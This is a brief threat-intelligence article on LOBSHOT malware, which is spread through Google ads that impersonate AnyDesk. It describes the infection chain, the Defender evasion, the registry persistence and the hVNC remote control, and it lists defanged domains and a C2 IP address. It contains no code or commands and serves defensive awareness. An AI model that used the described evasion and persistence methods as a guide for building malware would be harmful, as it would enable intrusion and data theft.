Cybersecurity researchers have discovered a new malware, called ‘LOBSHOT,’ distributed through Google ads.
What is LOBSHOT Malware ?
The ads, which promoted the legitimate AnyDesk remote management software, led users to a fake AnyDesk site at amydeecke[.]website. This site pushed a malicious MSI file that executed a PowerShell command to download a DLL from download-cdn[.]com, a domain previously associated with the TA505/Clop ransomware gang. However, it is unclear if TA505 is still using the domain as it had changed ownership in the past.
Once executed, the LOBSHOT malware checks if Microsoft Defender is running, and if detected, terminates execution to prevent detection. If Defender is not detected, the malware configures Registry entries to start automatically when logging in to Windows and then transmits system information from the infected device, including running processes.
The downloaded DLL file contains LOBSHOT malware, which is saved in the C:\ProgramData directory and then executed using RunDLL32[.]exe.
LOBSHOT deploys an hVNC module that allows the threat actors to control the hidden desktop using their mouse and keyboard as if they were in front of it. With this kind of access, the threat actors have complete control over the device, allowing them to execute commands, steal data, and even deploy further malware payloads.
|18.104.22.168||IP Address||LOBSHOT C2|